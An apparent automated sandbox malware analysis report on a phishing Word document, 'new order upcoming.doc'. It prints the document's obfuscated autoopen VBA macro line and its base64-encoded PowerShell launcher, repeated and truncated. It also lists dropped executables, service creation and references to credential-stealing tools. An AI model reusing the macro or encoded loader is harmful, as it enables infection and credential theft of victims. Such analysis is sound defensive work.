Binary or memory string: 7bcdedit.exe)

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\QYIyP.exe	Executable created and started: C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\wlangdi.exe	Executable created and started: C:\Windows\System32\wlangdi.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 4_2_004F1D8F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

4_2_004F1D8F

PE file contains an invalid checksum

Show sources

Source: QYIyP.exe.7.dr	Static PE information: real checksum: 0x9ed163c7 should be: 0x1e39a
Source: 39530.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x21090

PE file contains sections with non-standard names

Show sources

Source: QYIyP.exe.7.dr

Static PE information: section name: .code

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 4_2_004F11E4 push ds; retf	4_2_004F13A5
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 4_2_004F1010 push ss; retf	4_2_004F1011
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 5_2_003E1010 push ss; retf	5_2_003E1011
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 5_2_003E11E4 push ds; retf	5_2_003E13A5
Source: C:\Windows\System32\wlangdi.exe	Code function: 6_2_002E11E4 push ds; retf	6_2_002E13A5
Source: C:\Windows\System32\wlangdi.exe	Code function: 6_2_002E1010 push ss; retf	6_2_002E1011
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E11E4 push ds; retf	7_2_002E13A5
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E1010 push ss; retf	7_2_002E1011
Source: C:\Windows\System32\QYIyP.exe	Code function: 8_2_0051122A push ds; retf	8_2_005113A5
Source: C:\Windows\System32\QYIyP.exe	Code function: 8_2_005111E4 push ds; retf	8_2_005113A5
Source: C:\Windows\System32\QYIyP.exe	Code function: 8_2_00511010 push ss; retf	8_2_00511011
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A011E4 push ds; retf	9_2_00A013A5
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A0122A push ds; retf	9_2_00A013A5
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A01010 push ss; retf	9_2_00A01011

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xE784FEEB [Sat Jan 31 15:08:27 2093 UTC]

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: new order upcoming.doc	Stream path 'Macros/VBA/Module1' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Module1			Name: Module1

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Document has a 'comments' value indicative for goodware

Show sources

Source: new order upcoming.doc

Initial sample: OLE summary comments = poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAALAA4ADMAIAAsADEAMgAxACwAIAAxADEANQAg

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Symbols\aagmmc.pdb source: wlangdi.exe
Source:	Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source:	Binary string: mscorrc.pdb source: powershell.exe
Source:	Binary string: TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: wlangdi.exe
Source:	Binary string: 0=TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: 39530.exe
Source:	Binary string: D:\office\Target\outlook\x86\ship\1033\mapiR.pdb source: wlangdi.exe
Source:	Binary string: mspdbsrv_winx86_100.pdb source: wlangdi.exe, 39530.exe.2.dr
Source:	Binary string: 0@TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: wlangdi.exe
Source:	Binary string: 0@TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: wlangdi.exe
Source:	Binary string: 0PTEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: QYIyP.exe
Source:	Binary string: 0-TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: wlangdi.exe
Source:	Binary string: mspdbsrv_winx86_100.pdb@: source: wlangdi.exe, 39530.exe.2.dr
Source:	Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: wlangdi.exe
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: wlangdi.exe
Source:	Binary string: 0NTEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: 39530.exe
Source:	Binary string: D:\office\Target\outlook\x86\ship\1033\mapiR.pdbPDB source: wlangdi.exe

Document has a 'bytes' value indicative for goodware

Show sources

Source: new order upcoming.doc

Initial sample: OLE document summary bytes = 55296

Binary contains paths to development resources

Show sources

Source: WINWORD.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal100.evad.expl.phis.spyw.troj.winDOC@25/11@1/5

Contains functionality to create services

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,	5_2_003E8ABC
Source: C:\Windows\System32\wlangdi.exe	Code function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,	7_2_002E8ABC
Source: C:\Windows\System32\QYIyP.exe	Code function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,	9_2_00A08ABC

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 4_2_004F8197 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,lstrlenW,GetProcessHeap,RtlAllocateHeap,lstrcmpiW,lstrcpyW,lstrlenW,GetProcessHeap,HeapFree,

4_2_004F8197

Contains functionality to modify services (start/stop/modify)

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

5_2_003E8ABC

Creates files inside the program directory

Show sources

Source: C:\Windows\System32\wlangdi.exe

File created: C:\ProgramData\FDF4.tmp

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$w order upcoming.doc

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR2623.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: new order upcoming.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: new order upcoming.doc	OLE document summary: title field not present or empty
Source: new order upcoming.doc	OLE document summary: edited time not present or 0

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Queries a list of all open handles

Show sources

Source: C:\Windows\System32\wlangdi.exe

System information queried: HandleInformation

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

SQL strings found in memory and binary data

Show sources

Source: wlangdi.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wlangdi.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: wlangdi.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wlangdi.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wlangdi.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wlangdi.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wlangdi.exe	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: new order upcoming.doc

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\new order upcoming.doc
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: unknown	Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe'
Source: unknown	Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe
Source: unknown	Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown	Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown	Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: unknown	Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: unknown	Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown	Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknown	Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF4.tmp'
Source: unknown	Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF5.tmp'
Source: unknown	Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' 'C:\ProgramData\FDF6.tmp'
Source: unknown	Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: unknown	Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe'
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Process created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe
Source: C:\Windows\System32\wlangdi.exe	Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: C:\Windows\System32\wlangdi.exe	Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\QYIyP.exe	Process created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\wlangdi.exe	Process created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: C:\Windows\System32\wlangdi.exe	Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF4.tmp'
Source: C:\Windows\System32\wlangdi.exe	Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' 'C:\ProgramData\FDF6.tmp'
Source: C:\Windows\System32\wlangdi.exe	Process created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF5.tmp'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 5_2_003E20A9 memset,CreateProcessAsUserW,CreateProcessW,

5_2_003E20A9

Creates files inside the system directory

Show sources

Source: C:\Windows\System32\wlangdi.exe

File created: C:\Windows\system32\QYIyP.exe

Creates mutexes

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M1621D35E
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Mutant created: \Sessions\1\BaseNamedObjects\M9700BF63
Source: C:\Windows\System32\wlangdi.exe	Mutant created: \BaseNamedObjects\Global\I1621D35E
Source: C:\Windows\System32\QYIyP.exe	Mutant created: \BaseNamedObjects\MAC7BE04C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I1621D35E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\wlangdi.exe	Mutant created: \BaseNamedObjects\M20A03E5E

Document contains an embedded VBA macro which reads document properties (may be used for disguise)

Show sources

Source: new order upcoming.doc

OLE, VBA macro line: vba.shell$ "" + hgrrdtcwnfx + gugydafkr + lntbabdw + uzfpbzsbduh + ryfawrsecf + dnkhhvry + activedocument.builtindocumentproperties("co" + "mments") + hgrrdtcwnfx + gugydafkr + lntbabdw + uzfpbzsbduh + ryfawrsecf + dnkhhvry + frdsdgytpw, 0

Document contains embedded VBA macros

Show sources

Source: new order upcoming.doc

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exe	File read: C:\Windows\System32\drivers\etc\hosts

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: new order upcoming.doc	OLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function autoopen			Name: autoopen

Document contains an embedded VBA macro which may execute processes

Show sources

Source: new order upcoming.doc

OLE, VBA macro line: VBA.Shell$ "" + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + fRDSDGyTPw, 0

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 6498
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: Commandline size = 6498

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACw